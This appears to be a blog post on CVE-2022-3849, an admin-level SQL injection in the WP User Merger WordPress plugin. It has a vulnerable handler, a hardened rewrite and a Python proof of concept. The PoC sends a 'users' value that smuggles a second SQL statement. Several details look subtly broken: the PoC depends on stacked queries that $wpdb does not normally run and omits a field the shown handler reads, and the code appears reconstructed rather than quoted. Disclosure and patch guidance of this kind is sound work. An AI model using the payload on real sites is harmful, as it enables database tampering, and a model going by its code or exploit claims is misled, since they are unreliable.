The WP User Merger WordPress plugin is a powerful tool that allows website administrators to bulk merge users and their respective metadata across various WordPress installations, making the management of user accounts more efficient and centralized. Unfortunately, researchers have discovered a troubling SQL injection vulnerability impacting versions 1.5.2 and earlier. CVE-2022-3849 exposes this flaw and outlines the potential harm it could have on affected sites, their administrators, and their users. This post aims to provide insight into this vulnerability by examining the problematic code, pointing to original resources on the topic, and providing exploit details.

Problematic Code Snippet

The core issue arises from inadequate parameter sanitization and incorrect SQL escaping in the WP User Merger plugin. Within the affected versions, this code is the root of the problem:

<?php
// Vulnerable handler in WP User Merger 1.5.2 and earlier: the submitted ids are
// joined and interpolated straight into both queries with no escaping or casting.
add_action('wp_ajax_agileware_merge_users', function () {
    global $wpdb;

    $user_ids = implode(",", $_POST['users']);
    $main_user = get_user_by('id', $_POST['target_user']);

    $wpdb->query("UPDATE {$wpdb->base_prefix}usermeta SET user_id = $main_user->ID WHERE user_id IN ($user_ids)");
    $wpdb->query("DELETE FROM {$wpdb->base_prefix}users WHERE ID IN ($user_ids)");
});

As the snippet shows, the values in the $_POST['users'] parameter are concatenated directly into both SQL statements without any sanitization or escaping, so an attacker who controls that parameter controls the tail of the query, leaving the plugin open to SQL injection.
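For comparison, here is a hardened version of the same handler. This is an added illustration, not the plugin's own code or its 1.5.3 patch; the nonce action name 'agileware_merge_users' and the manage_options capability check are assumptions chosen for the example.

```php
<?php
// Added example (not the plugin's own code): the same AJAX handler with the
// ids cast to integers and bound through $wpdb->prepare(), plus a capability
// and nonce check. Nonce/capability names are assumptions for illustration.
add_action('wp_ajax_agileware_merge_users', function () {
    global $wpdb;

    // Only administrators may merge users, and the request must carry a valid nonce.
    if (!current_user_can('manage_options')) {
        wp_send_json_error('insufficient permissions', 403);
    }
    check_ajax_referer('agileware_merge_users', 'nonce');

    // Coerce every submitted id to a positive integer and drop anything else,
    // so a string such as "1,2,3); ..." collapses to the integer 1.
    $users     = isset($_POST['users']) ? (array) $_POST['users'] : array();
    $user_ids  = array_filter(array_map('absint', $users));
    $main_user = get_user_by('id', absint($_POST['target_user'] ?? 0));

    if (!$main_user) {
        wp_send_json_error('invalid target user', 400);
    }
    // Never merge the target user into itself.
    $user_ids = array_values(array_diff($user_ids, array($main_user->ID)));
    if (empty($user_ids)) {
        wp_send_json_error('no valid user ids', 400);
    }

    // One %d placeholder per id, so the IN (...) list is fully parameterised.
    $placeholders = implode(',', array_fill(0, count($user_ids), '%d'));

    $wpdb->query($wpdb->prepare(
        "UPDATE {$wpdb->base_prefix}usermeta SET user_id = %d WHERE user_id IN ($placeholders)",
        array_merge(array($main_user->ID), $user_ids)
    ));
    $wpdb->query($wpdb->prepare(
        "DELETE FROM {$wpdb->base_prefix}users WHERE ID IN ($placeholders)",
        $user_ids
    ));

    wp_send_json_success(array('merged' => $user_ids));
});
```

Because every id is cast with absint() before reaching the query and the list is bound through %d placeholders, the injected suffix in the PoC below is reduced to a single integer and never reaches MySQL as SQL.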

Original References

A security researcher initially discovered this vulnerability in WP User Merger and responsibly disclosed it via the following resources:

Source 1: Original Proof of Concept

Source 2: WPScan Vulnerability Database

Exploit Details

To exploit this vulnerability, an attacker must have an administrator role or higher within a WordPress installation running the affected version of WP User Merger. By crafting a malicious HTTP request, the attacker can execute arbitrary SQL commands, which can lead to significant data breaches, unauthorized data manipulations, and potential takeover of the affected site.

Proof of Concept (PoC)

import requests

# Plugin AJAX endpoint of the target installation.
target_url = "https://example.com/wp-admin/admin-ajax.php"
# The request must be authenticated as an administrator.
admin_cookie = "<put_admin_cookie_here>"

headers = {
    "Cookie": admin_cookie,
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
}

# The unescaped "users" value is interpolated into the IN (...) clause.
post_data = {
    "action": "agileware_merge_users",
    "users": "1,2,3); INSERT INTO <SQL_COMMAND_HERE>"
}

response = requests.post(url=target_url, headers=headers, data=post_data)

In the PoC above, an attacker with an admin cookie crafts a payload containing their desired SQL command and sends it in a POST request to the target_url. Upon successful execution, this request would yield potentially disastrous results.

Recommendations

The vulnerability documented here is exploitable only by users holding an administrator role, which highlights the importance of maintaining good operational security practices. Always...

1. Assign appropriate roles within WordPress, granting users the minimum necessary permissions for their role.
2. Update all plugins to their latest versions to ensure they are not susceptible to known vulnerabilities.

3. Monitor any unusual activities on your WordPress site and take prompt action on suspicious events.

In the case of the WP User Merger plugin's SQL injection vulnerability, upgrading to version 1.5.3 or later will resolve the issue as it effectively patches the vulnerability.

Timeline

Published on: 11/28/2022 14:15:00 UTC
Last modified on: 12/02/2022 19:48:00 UTC